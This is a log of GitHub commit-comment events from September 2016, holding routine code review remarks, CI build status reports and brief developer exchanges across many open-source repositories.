{"id":"4608596489","type":"CommitCommentEvent","actor":{"login":"narner"},"repo":{"name":"PaulBatchelor/Sporth"},"payload":{"comment":{"id":19146310,"position":null,"line":null,"path":null,"commit_id":"72777744da1233f861bb3ea463019f1a2f892c7a","created_at":"2016-09-23T13:38:39Z","updated_at":"2016-09-23T13:38:39Z","body":"That was a great commit comment. "}},"created_at":"2016-09-23T13:38:39Z"}
{"id":"4608601036","type":"CommitCommentEvent","actor":{"login":"Gachapen"},"repo":{"name":"overwork/moodlemobile2"},"payload":{"comment":{"id":19146318,"position":8,"line":8,"path":"www/addons/messages/templates/discussions.html","commit_id":"ee8761e9274adc29734dbd15fbfa58c580cac759","created_at":"2016-09-23T13:39:31Z","updated_at":"2016-09-23T13:39:31Z","body":"You added an extra space before `>`. Remove it."}},"created_at":"2016-09-23T13:39:31Z"}
{"id":"4608603571","type":"CommitCommentEvent","actor":{"login":"Gachapen"},"repo":{"name":"overwork/moodlemobile2"},"payload":{"comment":{"id":19146325,"position":7,"line":11,"path":"www/addons/participants/templates/list.html","commit_id":"ee8761e9274adc29734dbd15fbfa58c580cac759","created_at":"2016-09-23T13:39:59Z","updated_at":"2016-09-23T13:39:59Z","body":">"}},"created_at":"2016-09-23T13:39:59Z"}
{"id":"4608607526","type":"CommitCommentEvent","actor":{"login":"nursix"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19146337,"position":5,"line":1042,"path":"modules/s3/s3resource.py","commit_id":"3adc2fb21df191adcaab8a076cbf89f08a5c0876","created_at":"2016-09-23T13:40:42Z","updated_at":"2016-09-23T13:40:42Z","body":"I disagree - this isn't about protection, but about valid behavior.\r\n\r\nUsing a user_id=0 is only ever valid if auth.override is True (exception! not rule) - in all other cases the caller can (rightfully) assume that anonymous users will have a user_id of None.\r\n\r\n(And why else would you actually set auth.override=True in the case you try to fix this for? Right - because it is the exception, so pls don't generalize it here)."}},"created_at":"2016-09-23T13:40:42Z"}
{"id":"4608607672","type":"CommitCommentEvent","actor":{"login":"Gachapen"},"repo":{"name":"overwork/moodlemobile2"},"payload":{"comment":{"id":19146338,"position":5,"line":143,"path":"www/core/components/user/services/user.js","commit_id":"ee8761e9274adc29734dbd15fbfa58c580cac759","created_at":"2016-09-23T13:40:44Z","updated_at":"2016-09-23T13:40:44Z","body":"What does this mean?"}},"created_at":"2016-09-23T13:40:44Z"}
{"id":"4608611446","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19146346,"position":null,"line":null,"path":null,"commit_id":"ac0d4e7748e0135ff367bc55e1132cbee7f2cc14","created_at":"2016-09-23T13:41:26Z","updated_at":"2016-09-23T13:41:26Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1789 of 1789 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ac0d4e7748e0135ff367bc55e1132cbee7f2cc14-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ac0d4e7748e0135ff367bc55e1132cbee7f2cc14-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-23T13:41:26Z"}
{"id":"4608613776","type":"CommitCommentEvent","actor":{"login":"galeaspablo"},"repo":{"name":"fourlabsldn/QBJSParser"},"payload":{"comment":{"id":19146352,"position":null,"line":null,"path":null,"commit_id":"7aa92663076d5b5103410a5cff9cb2c9bccf447d","created_at":"2016-09-23T13:41:52Z","updated_at":"2016-09-23T13:41:52Z","body":"http://stackoverflow.com/questions/519520/difference-between-static-class-and-singleton-pattern#answer-519536"}},"created_at":"2016-09-23T13:41:52Z"}
{"id":"4608615441","type":"CommitCommentEvent","actor":{"login":"Gachapen"},"repo":{"name":"overwork/moodlemobile2"},"payload":{"comment":{"id":19146356,"position":5,"line":734,"path":"www/core/scss/styles.scss","commit_id":"ee8761e9274adc29734dbd15fbfa58c580cac759","created_at":"2016-09-23T13:42:12Z","updated_at":"2016-09-23T13:42:12Z","body":"An extra line that you probably should remove."}},"created_at":"2016-09-23T13:42:12Z"}
{"id":"4608616625","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19146361,"position":null,"line":null,"path":null,"commit_id":"ac0d4e7748e0135ff367bc55e1132cbee7f2cc14","created_at":"2016-09-23T13:42:24Z","updated_at":"2016-09-23T13:42:24Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ac0d4e7748e0135ff367bc55e1132cbee7f2cc14-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-23T13:42:24Z"}
{"id":"4608620477","type":"CommitCommentEvent","actor":{"login":"Twiiiiin"},"repo":{"name":"Twiiiiin/Vagrant_TEST"},"payload":{"comment":{"id":19146378,"position":4,"line":9,"path":"VERSION.md","commit_id":"892b0b8e7e8c6f948d907597f53271d576b1f012","created_at":"2016-09-23T13:43:06Z","updated_at":"2016-09-23T13:43:06Z","body":"This is a comment test"}},"created_at":"2016-09-23T13:43:06Z"}
{"id":"4608624395","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19146394,"position":null,"line":null,"path":null,"commit_id":"a0f4c57da7487b2779f72011c2debbeb657a5082","created_at":"2016-09-23T13:43:50Z","updated_at":"2016-09-23T13:43:50Z","body":"Actually is not funny, but you cannot know it in advance..."}},"created_at":"2016-09-23T13:43:50Z"}
{"id":"4608629755","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19146407,"position":null,"line":null,"path":null,"commit_id":"1908f6823e3f706c60bbf4f9f703dede56f6fad7","created_at":"2016-09-23T13:44:52Z","updated_at":"2016-09-23T13:44:52Z","body":"I also managed to repair the site_links and email_templates. apparently is a \".\"  not a \",\""}},"created_at":"2016-09-23T13:44:52Z"}
{"id":"4608644482","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19146432,"position":null,"line":null,"path":null,"commit_id":"fcb2ad2ad96b7d4c38ab49f1044413d05796e40e","created_at":"2016-09-23T13:47:32Z","updated_at":"2016-09-23T13:47:32Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#TLprDvK-RWKpIrsGHO07iQ"}},"created_at":"2016-09-23T13:47:32Z"}
{"id":"4608646153","type":"CommitCommentEvent","actor":{"login":"mdshw5"},"repo":{"name":"COMBINE-lab/salmon"},"payload":{"comment":{"id":19146437,"position":null,"line":null,"path":null,"commit_id":"ffd249c287434f7d405290b428c01c9572ddf295","created_at":"2016-09-23T13:47:51Z","updated_at":"2016-09-23T13:47:51Z","body":"This looks like a fine solution for my use case in COMBINE-lab/RapMap#32. If 0.7.3 is around the corner I'll just wait to test in that release - otherwise I might try to set up a build box. Do you have any plans to set up some CI tests? I could imagine the CI build artifacts could be useful as unstable feature builds for people like myself to test..."}},"created_at":"2016-09-23T13:47:51Z"}
{"id":"4608651856","type":"CommitCommentEvent","actor":{"login":"bcosca"},"repo":{"name":"bcosca/fatfree-core"},"payload":{"comment":{"id":19146460,"position":null,"line":null,"path":null,"commit_id":"9c1e1d7b9f08a3dc3be569657db7ce2b6f8ce16c","created_at":"2016-09-23T13:48:52Z","updated_at":"2016-09-23T13:48:52Z","body":"Yes, you can use it in such cases where you don't have to create a hive variable to map to different OAuth2 API return values:\r\n\r\nfields=name:name, email:email, photo:picture /* Google */\r\nfields=name:name, email:email, photo:picture.data.url /* Facebook */\r\nfields=name:name, email:email ,photo:avatar_url /* Github */\r\n\r\nLook at the Facebook field mapping."}},"created_at":"2016-09-23T13:48:52Z"}
{"id":"4608652332","type":"CommitCommentEvent","actor":{"login":"elKaZe"},"repo":{"name":"piratas-ar/RocketGatitOS"},"payload":{"comment":{"id":19146461,"position":null,"line":null,"path":null,"commit_id":"17b36f232ab2ed190c24c9be7dfb2960e23c2292","created_at":"2016-09-23T13:48:57Z","updated_at":"2016-09-23T13:48:57Z","body":"#9 "}},"created_at":"2016-09-23T13:48:57Z"}
{"id":"4608661546","type":"CommitCommentEvent","actor":{"login":"kevgs"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":19146480,"position":null,"line":null,"path":null,"commit_id":"e0ef1e342c44bfd1adbe897f024f495451189586","created_at":"2016-09-23T13:50:35Z","updated_at":"2016-09-23T13:50:35Z","body":"gcc warns on this patch:\r\n`/home/kevg/Desktop/mariadb_10.2/storage/innobase/dict/dict0boot.cc: In function ‘dberr_t dict_boot()’:\r\n/home/kevg/Desktop/mariadb_10.2/storage/innobase/dict/dict0boot.cc:472:24: warning: format ‘%d’ expects argument of type ‘int’, but argument 3 has type ‘ulong {aka long unsigned int}’ [-Wformat=]\r\n      srv_force_recovery);\r\n                        ^`"}},"created_at":"2016-09-23T13:50:35Z"}
{"id":"4608662824","type":"CommitCommentEvent","actor":{"login":"maxazan"},"repo":{"name":"webarkio/wp_qoob"},"payload":{"comment":{"id":19146484,"position":33,"line":610,"path":"qoob.php","commit_id":"56bea6daa92a44fa93fee7eb26949daaeeaa40b5","created_at":"2016-09-23T13:50:48Z","updated_at":"2016-09-23T13:50:48Z","body":"для тестов же нужно"}},"created_at":"2016-09-23T13:50:48Z"}
{"id":"4608674784","type":"CommitCommentEvent","actor":{"login":"k-rister"},"repo":{"name":"k-rister/lua-trafficgen"},"payload":{"comment":{"id":19146513,"position":null,"line":null,"path":null,"commit_id":"45814e59bd160e160a103c9f24cff5b7528e7728","created_at":"2016-09-23T13:52:56Z","updated_at":"2016-09-23T13:52:56Z","body":"@atheurer\r\n\r\nCurious what you think of this concept?"}},"created_at":"2016-09-23T13:52:56Z"}
{"id":"4608677329","type":"CommitCommentEvent","actor":{"login":"eeeyang"},"repo":{"name":"eeeyang/SmartAuth"},"payload":{"comment":{"id":19146520,"position":11,"line":11,"path":"test.cs","commit_id":"e4db8bf52c7dd2776cf634ba54fa5f2faea91e4f","created_at":"2016-09-23T13:53:23Z","updated_at":"2016-09-23T13:53:23Z","body":"콘솔에 쓴다능"}},"created_at":"2016-09-23T13:53:23Z"}
{"id":"4608686200","type":"CommitCommentEvent","actor":{"login":"niranjanraoh"},"repo":{"name":"ubirch/ubirch-board-firmware"},"payload":{"comment":{"id":19146547,"position":5,"line":5,"path":"tests/board/test_rf_lpuart.c","commit_id":"b2e426945b5b9a0dfdfe1ad53d763a6b46b67b47","created_at":"2016-09-23T13:55:00Z","updated_at":"2016-09-23T13:55:00Z","body":"@thinkberg  can you comment on this\r\n+  rf_config_t *rf_config;\r\n +  rf_config = &rf_config_default;"}},"created_at":"2016-09-23T13:55:00Z"}
{"id":"4608687967","type":"CommitCommentEvent","actor":{"login":"k-rister"},"repo":{"name":"k-rister/lua-trafficgen"},"payload":{"comment":{"id":19146550,"position":null,"line":null,"path":null,"commit_id":"faebe6bf9deca02cf89313b8dd7aa9d620a06961","created_at":"2016-09-23T13:55:18Z","updated_at":"2016-09-23T13:55:18Z","body":"#7"}},"created_at":"2016-09-23T13:55:18Z"}
{"id":"4608690729","type":"CommitCommentEvent","actor":{"login":"maxazan"},"repo":{"name":"webarkio/qoob"},"payload":{"comment":{"id":19146556,"position":7,"line":50,"path":"js/qoob.js","commit_id":"399f3499475ae7119b7c5cf14b00f7dd153b6494","created_at":"2016-09-23T13:55:48Z","updated_at":"2016-09-23T13:55:48Z","body":"лучше `addTranslations` и `addLibs`"}},"created_at":"2016-09-23T13:55:48Z"}
{"id":"4608692123","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19146561,"position":null,"line":null,"path":null,"commit_id":"fcb2ad2ad96b7d4c38ab49f1044413d05796e40e","created_at":"2016-09-23T13:56:04Z","updated_at":"2016-09-23T13:56:04Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#K_jI--wLTiyo_44CwvWepg"}},"created_at":"2016-09-23T13:56:04Z"}
{"id":"4608694917","type":"CommitCommentEvent","actor":{"login":"marhyorh"},"repo":{"name":"marhyorh/FreeCodeCamp"},"payload":{"comment":{"id":19146568,"position":null,"line":null,"path":null,"commit_id":"2a3cdb0ee5449206b6aa208c37bde1ea5b4321b0","created_at":"2016-09-23T13:56:31Z","updated_at":"2016-09-23T13:56:31Z","body":"Okay, will fix them up :+1:"}},"created_at":"2016-09-23T13:56:31Z"}
{"id":"4608699416","type":"CommitCommentEvent","actor":{"login":"k-rister"},"repo":{"name":"k-rister/lua-trafficgen"},"payload":{"comment":{"id":19146579,"position":null,"line":null,"path":null,"commit_id":"4601389237c9cee0683940198530d6eddb528da9","created_at":"2016-09-23T13:57:16Z","updated_at":"2016-09-23T13:57:16Z","body":"#3"}},"created_at":"2016-09-23T13:57:16Z"}
{"id":"4608700506","type":"CommitCommentEvent","actor":{"login":"tmhn"},"repo":{"name":"jberry92/razbezwines"},"payload":{"comment":{"id":19146582,"position":null,"line":null,"path":null,"commit_id":"9ac4abf1acf43f05ffeec69b718ddd57b3646185","created_at":"2016-09-23T13:57:27Z","updated_at":"2016-09-23T13:57:27Z","body":"👍 for commit messages @jberry92 "}},"created_at":"2016-09-23T13:57:27Z"}
{"id":"4608702465","type":"CommitCommentEvent","actor":{"login":"jboz62"},"repo":{"name":"meetinghouse/cms"},"payload":{"comment":{"id":19146587,"position":26,"line":72,"path":"app/controllers/BaseController.php","commit_id":"2d6b3e32e2b7e92a92c8f55becfff10fa973c50a","created_at":"2016-09-23T13:57:47Z","updated_at":"2016-09-23T13:57:47Z","body":"@vivek-chaudhari Vivek, It looks like there are still hard coded menu items here. These should be dynamic, displaying pages/posts. Am I reading that right?"}},"created_at":"2016-09-23T13:57:47Z"}
{"id":"4608706390","type":"CommitCommentEvent","actor":{"login":"maleadt"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19146596,"position":null,"line":null,"path":null,"commit_id":"762cdf14382f4979df6ff9f909d0af9f053082dc","created_at":"2016-09-23T13:58:26Z","updated_at":"2016-09-23T13:58:26Z","body":"@nanosoldier `runbenchmarks(ALL, vs = \":master\")`"}},"created_at":"2016-09-23T13:58:26Z"}
{"id":"4608710014","type":"CommitCommentEvent","actor":{"login":"dpotikha"},"repo":{"name":"coderiver/plitka"},"payload":{"comment":{"id":19146602,"position":67,"line":2716,"path":"css/style.css","commit_id":"70a9a38b7f93aa052b4990d950a9132ae1dddfcf","created_at":"2016-09-23T13:59:03Z","updated_at":"2016-09-23T13:59:03Z","body":"Дима, постарайся без лишних строк верстать"}},"created_at":"2016-09-23T13:59:03Z"}
{"id":"4608711423","type":"CommitCommentEvent","actor":{"login":"sherrellbc"},"repo":{"name":"ARMmbed/uvisor"},"payload":{"comment":{"id":19146603,"position":null,"line":null,"path":null,"commit_id":"06622510c07d186de3d404c68e316ec80e4c8770","created_at":"2016-09-23T13:59:17Z","updated_at":"2016-09-23T13:59:17Z","body":"@Patater,\r\n\r\nPerfect. I was able to successfully instrument RPC on the K64F platform. I imagine with technology so new it can be difficult to maintain coherence among documentation and source code with it all changing so rapidly. I just wanted to point out that there was a new parameter added to the `rpc_fncall_waitfor` function -- the [callee box ID](https://github.com/ARMmbed/uvisor/blob/1414ed786ccb21c2610f526a9279eafc1b8849d3/api/inc/rpc.h#L31) -- that is not yet mentioned in the documentation. Otherwise it provides sufficient information to get started. "}},"created_at":"2016-09-23T13:59:17Z"}
{"id":"4608713652","type":"CommitCommentEvent","actor":{"login":"rob-p"},"repo":{"name":"COMBINE-lab/salmon"},"payload":{"comment":{"id":19146609,"position":null,"line":null,"path":null,"commit_id":"ffd249c287434f7d405290b428c01c9572ddf295","created_at":"2016-09-23T13:59:41Z","updated_at":"2016-09-23T13:59:41Z","body":"^^^^ I would *love* to have some of these tests.  This has been on my list for some time, but unfortunately has been constantly superseded by other things.  I would really like to have some automated regression tests so that we can see the results of unstable features over at least a small range of different data.  Currently, this consists of me manually checking runs over a small set of data, which is clearly not a scalable solution (and has a bus factor of 1).  If you have any ideas for regression tests, I'd be happy to discuss how we could automate them (and absolutely welcome PRs)."}},"created_at":"2016-09-23T13:59:41Z"}
{"id":"4608716585","type":"CommitCommentEvent","actor":{"login":"Metalick"},"repo":{"name":"Armax/Pokemon-GO-node-api"},"payload":{"comment":{"id":19146616,"position":null,"line":null,"path":null,"commit_id":"29fbf080b518a43bbe7ef380dc4f84bb3b6e3c3a","created_at":"2016-09-23T14:00:11Z","updated_at":"2016-09-23T14:00:11Z","body":"I've tried changing the pokemon.proto like your commit, but I'm still getting individual_attack, individual_defense and individual_stamina = null."}},"created_at":"2016-09-23T14:00:11Z"}
{"id":"4608718772","type":"CommitCommentEvent","actor":{"login":"ZelStudio"},"repo":{"name":"madmunki/iReSign"},"payload":{"comment":{"id":19146624,"position":null,"line":null,"path":null,"commit_id":"674731de0615b54ce3278579a324dc93da4c62be","created_at":"2016-09-23T14:00:31Z","updated_at":"2016-09-23T14:00:31Z","body":"Nice ! Thx"}},"created_at":"2016-09-23T14:00:31Z"}
{"id":"4608720376","type":"CommitCommentEvent","actor":{"login":"ten0s"},"repo":{"name":"jenkinsci/pipeline-examples"},"payload":{"comment":{"id":19146629,"position":null,"line":null,"path":null,"commit_id":"d4abfbed5c4ba71986fada193be9501c21d99287","created_at":"2016-09-23T14:00:47Z","updated_at":"2016-09-23T14:00:47Z","body":"@selvarajmit,\r\n\r\nRight! I Had the same problem. You need to add 'return this' at the very end of the loaded file.\r\n"}},"created_at":"2016-09-23T14:00:47Z"}
{"id":"4608720647","type":"CommitCommentEvent","actor":{"login":"bcosca"},"repo":{"name":"bcosca/fatfree-core"},"payload":{"comment":{"id":19146631,"position":null,"line":null,"path":null,"commit_id":"0e2a3e73c0a565568965e9836e1140a22fd4304c","created_at":"2016-09-23T14:00:49Z","updated_at":"2016-09-23T14:00:49Z","body":"This doesn't preserve the aspect ratio when only one dimension is specified. If only the width is given, the image should be a square."}},"created_at":"2016-09-23T14:00:49Z"}
{"id":"4608722391","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19146635,"position":null,"line":null,"path":null,"commit_id":"e2d2f83ad2b56e83dbd31f5de50ebf1620c0f6d3","created_at":"2016-09-23T14:01:08Z","updated_at":"2016-09-23T14:01:08Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1147](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14139&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T14:01:08Z"}
{"id":"4608722416","type":"CommitCommentEvent","actor":{"login":"maxazan"},"repo":{"name":"webarkio/qoob"},"payload":{"comment":{"id":19146637,"position":24,"line":31,"path":"js/qoob-loader.js","commit_id":"0c013bc873cf5ff6579f2c11c495b6d196dcd2c7","created_at":"2016-09-23T14:01:09Z","updated_at":"2016-09-23T14:01:09Z","body":"а чего текст по умолчания не написали?"}},"created_at":"2016-09-23T14:01:09Z"}
{"id":"4608724898","type":"CommitCommentEvent","actor":{"login":"lilaluca"},"repo":{"name":"leapcode/leap_web"},"payload":{"comment":{"id":19146641,"position":null,"line":null,"path":null,"commit_id":"4a73c2ca2938ae748588d7ca72a785af99724c92","created_at":"2016-09-23T14:01:32Z","updated_at":"2016-09-23T14:01:32Z","body":"Does this mean, that main view gets modified - and potentially the twitter feature included - via file in config/customization overwriting app/views/home?\r\nwe set\r\nif twitter_enabled == true \r\nfor including twitter in main view. Is this unnecessary now @azul @varac ?\r\n"}},"created_at":"2016-09-23T14:01:32Z"}
{"id":"4608730296","type":"CommitCommentEvent","actor":{"login":"AndyMt"},"repo":{"name":"AndyMt/GravityTurn"},"payload":{"comment":{"id":19146651,"position":null,"line":null,"path":null,"commit_id":"85d8c2c23dfb8cc733569788920f64335de6e951","created_at":"2016-09-23T14:02:29Z","updated_at":"2016-09-23T14:02:29Z","body":"Updated Version number"}},"created_at":"2016-09-23T14:02:29Z"}
{"id":"4608730513","type":"CommitCommentEvent","actor":{"login":"padde"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19146652,"position":null,"line":null,"path":null,"commit_id":"9f6e82ee4783e491c20f5244a613fdeb4024beb5","created_at":"2016-09-23T14:02:29Z","updated_at":"2016-09-23T14:02:29Z","body":"Ditto, this makes `travel_to` pretty much useless for assertions on Postgres timestamps."}},"created_at":"2016-09-23T14:02:29Z"}
{"id":"4608740689","type":"CommitCommentEvent","actor":{"login":"flukemilo"},"repo":{"name":"flukemilo/CoxInterviewGraham"},"payload":{"comment":{"id":19146671,"position":null,"line":null,"path":null,"commit_id":"4b3e114e12191f529beb4d5224aa5751c731d3a0","created_at":"2016-09-23T14:04:05Z","updated_at":"2016-09-23T14:04:05Z","body":"Please extract both of these files to the same directory.  "}},"created_at":"2016-09-23T14:04:05Z"}
{"id":"4608750128","type":"CommitCommentEvent","actor":{"login":"Merf61"},"repo":{"name":"leopck/Yee-Light-Blue"},"payload":{"comment":{"id":19146694,"position":null,"line":null,"path":null,"commit_id":"1728d73ed82a292f8e68e1bdffaef2ee5c650ea2","created_at":"2016-09-23T14:05:48Z","updated_at":"2016-09-23T14:05:48Z","body":"I have done everything I believe was needed but still no change in the bulb. I used hcitool lescan and found the mac address and put it in test.py. hci0 is up here is what I get in response on the screen. I am missing something.\r\n sudo python test.py hci0\r\nConnection handle 72\r\n3235352c302c302c3130302c2c2c2c2c2c2c\r\n302c3235352c302c3130302c2c2c2c2c2c2c\r\n302c302c3235352c3130302c2c2c2c2c2c2c\r\n3235352c3235352c3235352c35302c2c2c2c\r\n\r\n"}},"created_at":"2016-09-23T14:05:48Z"}
{"id":"4608752147","type":"CommitCommentEvent","actor":{"login":"WolfgangFahl"},"repo":{"name":"rythmengine/rythmengine"},"payload":{"comment":{"id":19146697,"position":null,"line":null,"path":null,"commit_id":"e088577eb5a25ca06c9c4d9b55f90411af1fed87","created_at":"2016-09-23T14:06:09Z","updated_at":"2016-09-23T14:06:09Z","body":"My reason wasn't about compatibility. It was simply that the tests didn't  work any more in eclipse. I am happy with a JDK 1.6 configuration if it works but would also recommend not to stick to 1.6. since 1.7 has lots of improvements that we might well use for software engineering reasons."}},"created_at":"2016-09-23T14:06:09Z"}
{"id":"4608757276","type":"CommitCommentEvent","actor":{"login":"flavour"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19146717,"position":5,"line":1042,"path":"modules/s3/s3resource.py","commit_id":"3adc2fb21df191adcaab8a076cbf89f08a5c0876","created_at":"2016-09-23T14:07:05Z","updated_at":"2016-09-23T14:07:05Z","body":"On 23 September 2016 at 14:40, Dominic König <notifications@github.com>\nwrote:\n\n> I disagree - this isn't about protection, but about valid behavior.\n>\n> Using a user_id=0 is only ever valid if auth.override is True (exception!\n> not rule) - in all other cases the caller can (rightfully) assume that\n> anonymous users will have a user_id of None.\n>\n\nCaller should never call this API without checking for\nAuthorization...simply having a valid user_id is way insufficient.\n\n& why deny people the opportunity to build a system where people approve\nanonymously if they wish to by burying this restriction within this\nfunction?\n\nDoesn't seem logical to me.\n\nHowever I won't argue the toss any more - it's not a big deal to add the\nextra check...I did consider it originally but felt it was an unnecessary\noverhead....if you feel tthat you wish to impose this overhead & add\nrestrictions in multiple layers then I have no current usecase which goes\naginst it so won't fight it.\n\nF\n"}},"created_at":"2016-09-23T14:07:05Z"}
{"id":"4608767120","type":"CommitCommentEvent","actor":{"login":"jdolan"},"repo":{"name":"jdolan/quetoo-data"},"payload":{"comment":{"id":19146745,"position":null,"line":null,"path":null,"commit_id":"2be085045a8f0fc145a2502a827d59c8bb91bb28","created_at":"2016-09-23T14:08:51Z","updated_at":"2016-09-23T14:08:51Z","body":"💯 "}},"created_at":"2016-09-23T14:08:51Z"}
{"id":"4608769134","type":"CommitCommentEvent","actor":{"login":"Patater"},"repo":{"name":"ARMmbed/uvisor"},"payload":{"comment":{"id":19146750,"position":null,"line":null,"path":null,"commit_id":"06622510c07d186de3d404c68e316ec80e4c8770","created_at":"2016-09-23T14:09:11Z","updated_at":"2016-09-23T14:09:11Z","body":"@sherrellbc Thanks very much for the feedback. I'll go fix the `rpc_fncall_waitfor` function documentation."}},"created_at":"2016-09-23T14:09:11Z"}
{"id":"4608770011","type":"CommitCommentEvent","actor":{"login":"nefiger"},"repo":{"name":"Code4SA/code4sa.github.io"},"payload":{"comment":{"id":19146751,"position":20,"line":20,"path":"_posts/2016-09-26-media-professionals-about-data-driven-journalism.md","commit_id":"53911abe665502b80092ad52a752c88bf12c0462","created_at":"2016-09-23T14:09:20Z","updated_at":"2016-09-23T14:09:20Z","body":"@longhotsummer any ideas here?"}},"created_at":"2016-09-23T14:09:20Z"}
{"id":"4608774521","type":"CommitCommentEvent","actor":{"login":"nefiger"},"repo":{"name":"Code4SA/code4sa.github.io"},"payload":{"comment":{"id":19146769,"position":35,"line":35,"path":"_posts/2016-09-26-media-professionals-about-data-driven-journalism.md","commit_id":"53911abe665502b80092ad52a752c88bf12c0462","created_at":"2016-09-23T14:10:08Z","updated_at":"2016-09-23T14:10:08Z","body":"I think hosting it on gDrive should be fine? Unless you feel we should pop it in github, @longhotsummer?"}},"created_at":"2016-09-23T14:10:08Z"}
{"id":"4608776588","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19146774,"position":null,"line":null,"path":null,"commit_id":"e2d2f83ad2b56e83dbd31f5de50ebf1620c0f6d3","created_at":"2016-09-23T14:10:29Z","updated_at":"2016-09-23T14:10:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1147](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14139&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 232, ignored: 3 Build time: 00:09:20\n### Failed tests\n```\norg.genivi.sota.core.PackageResourceWordSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-23T14:10:29Z"}
{"id":"4608787566","type":"CommitCommentEvent","actor":{"login":"Ghilt"},"repo":{"name":"Ghilt/simulaton"},"payload":{"comment":{"id":19146795,"position":null,"line":null,"path":null,"commit_id":"363a833f31fc7909a0d130358b17b887cf82ec9d","created_at":"2016-09-23T14:12:25Z","updated_at":"2016-09-23T14:12:25Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make initial UML diagram](https://trello.com/c/YtW7bt4c/11-make-initial-uml-diagram)"}},"created_at":"2016-09-23T14:12:25Z"}
{"id":"4608793609","type":"CommitCommentEvent","actor":{"login":"bjorn3"},"repo":{"name":"oli-obk/miri"},"payload":{"comment":{"id":19146807,"position":105,"line":653,"path":"src/interpreter/mod.rs","commit_id":"2282289ad5fbfaaaffd6b4fe4ceb6665ab9ab391","created_at":"2016-09-23T14:13:29Z","updated_at":"2016-09-23T14:13:29Z","body":"Please combine the pat of `VtablePtr` and `SlicePtr` with `|`."}},"created_at":"2016-09-23T14:13:29Z"}
{"id":"4608795853","type":"CommitCommentEvent","actor":{"login":"gut"},"repo":{"name":"facebook/hhvm"},"payload":{"comment":{"id":19146811,"position":null,"line":null,"path":null,"commit_id":"18709c6d5541c191ed6353dec6da8b22fa64fafb","created_at":"2016-09-23T14:13:49Z","updated_at":"2016-09-23T14:13:49Z","body":"@mxw : damn, the PR summary needed to be updated and I didn't notice during review :("}},"created_at":"2016-09-23T14:13:49Z"}
{"id":"4608795955","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19146812,"position":null,"line":null,"path":null,"commit_id":"7ba17a9d39b7ba9eacd53e12d3ff6b0a3ebce5b0","created_at":"2016-09-23T14:13:51Z","updated_at":"2016-09-23T14:13:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1148](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14145&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T14:13:51Z"}
{"id":"4608802586","type":"CommitCommentEvent","actor":{"login":"mgingras01"},"repo":{"name":"SiweiYuan/R-Programming-Assignment-2-Lexical-Scoping"},"payload":{"comment":{"id":19146829,"position":null,"line":null,"path":null,"commit_id":"3a591bcc05163c35afdbb8b2c720a1a4a1598e13","created_at":"2016-09-23T14:15:04Z","updated_at":"2016-09-23T14:15:04Z","body":"Thank you for the example of this week assignment, SiweiYuan."}},"created_at":"2016-09-23T14:15:04Z"}
{"id":"4608805042","type":"CommitCommentEvent","actor":{"login":"boynton06"},"repo":{"name":"boynton06/2048-"},"payload":{"comment":{"id":19146832,"position":172,"line":172,"path":"stylesheets/stylesheet.css","commit_id":"1ab4dc851c72b41579e6061af5192f4861672ca4","created_at":"2016-09-23T14:15:29Z","updated_at":"2016-09-23T14:15:29Z","body":"Blue"}},"created_at":"2016-09-23T14:15:29Z"}
